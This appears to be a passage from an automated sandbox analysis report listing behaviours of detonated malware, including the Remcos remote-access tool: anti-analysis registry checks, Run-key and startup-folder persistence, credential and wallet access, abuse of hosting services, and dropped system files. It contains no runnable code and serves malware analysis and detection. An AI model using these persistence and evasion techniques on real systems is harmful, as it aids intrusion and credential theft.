| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3824_133785002056803866\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3824_133785002056803866\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
Checks installed software on the system
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\xda | C:\Windows\system32\svchost.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
